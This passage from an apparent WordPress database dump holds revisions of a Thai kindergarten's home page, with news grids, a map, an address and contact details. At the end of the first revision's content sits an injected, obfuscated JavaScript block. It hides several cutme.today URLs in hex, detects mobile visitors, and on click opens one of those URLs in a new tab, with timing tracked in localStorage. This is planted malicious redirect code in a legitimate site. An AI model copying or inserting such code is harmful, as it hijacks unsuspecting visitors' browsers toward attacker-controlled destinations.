{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:38:10','2024-08-23 07:38:10','',19,'http://watprato.ssk.in.th/?p=210',0,'revision','',0),
(212,2,'2024-08-23 14:50:09','2024-08-23 07:50:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span 